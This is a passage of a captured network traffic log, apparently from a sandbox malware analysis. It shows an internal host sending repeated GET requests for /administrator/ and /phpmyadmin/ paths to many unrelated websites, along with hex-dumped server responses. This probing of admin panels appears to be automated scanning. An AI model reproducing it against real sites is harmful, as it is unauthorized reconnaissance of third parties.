dc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="unde
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 Data Ascii: a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.every
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f Data Ascii: -block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 Data Ascii: er:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d Data Ascii: #fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c Data Ascii: ight-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 Data Ascii: reset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	56706	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_b/+ZzoFwhSSD9q4PpaobwB+0g8tnkRjvv2QneVHuqTijgIpjZadVnbEgzUMmoQPredb/K2q80PScyxmdFrJJJw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:09 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.6	56704	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	178	OUT	GET /administrator/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_PwRnGnrCVebiaC+mavKp0o9+PLlhLdlG4BbZ+VI6h4L6oa3pg5pXzfQiv43El4/ihwwNi74D+8Uv+XlK3xZtLw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:09 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	56733	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	216	OUT	GET / HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=1k9i469srqfgmr47e40c9d4e5j User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	360	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://sell.sawbrokers.com/domain/stylesense.co.uk/
2024-02-20 23:26:09 UTC	13	IN	Data Raw: 33 0d 0a 20 20 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 3 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	56942	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FbvEMrqsjKDRC9ThXAI+DHFNBovSsQ9JlX1bqPEGbPfUeADVtOBl/ZpevJZx36NBIs42EKJzgq2gvP+iLGYzkQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:09 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	56777	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	189	OUT	GET /administrator/index.php HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	393	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Vary: User-Agent Location: https://ksv-schwimmen.de/administrator/ Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	56770	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	183	OUT	GET /administrator/index.php HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:09 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	56824	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:10 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:10 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: phpMyAdmin_https=lv324hi5uec14end8mi8sc3po8; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
2024-02-20 23:26:10 UTC	493	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 31 30 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 43 43 25 32 42 59 4f 32 6f 31 6e 55 6b 72 7a 61 6e 38 4a 6a 57 36 4c 38 58 5a 34 71 50 37 31 68 59 79 30 49 67 70 71 5a 61 6f 76 38 51 7a 74 49 6d 43 42 6b 34 49 65 59 64 72 6d 4e 4f 4a 51 75 32 6d 71 47 4c 65 31 4e 4d 46 65 7a 75 41 57 74 58 56 38 54 39 75 25 32 46 4e 4c 75 4e 44 63 65 79 53 45 49 65 6b 7a 72 66 Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:10 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CC%2BYO2o1nUkrzan8JjW6L8XZ4qP71hYy0IgpqZaov8QztImCBk4IeYdrmNOJQu2mqGLe1NMFezuAWtXV8T9u%2FNLuNDceySEIekzrf
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 34 37 64 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47da<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
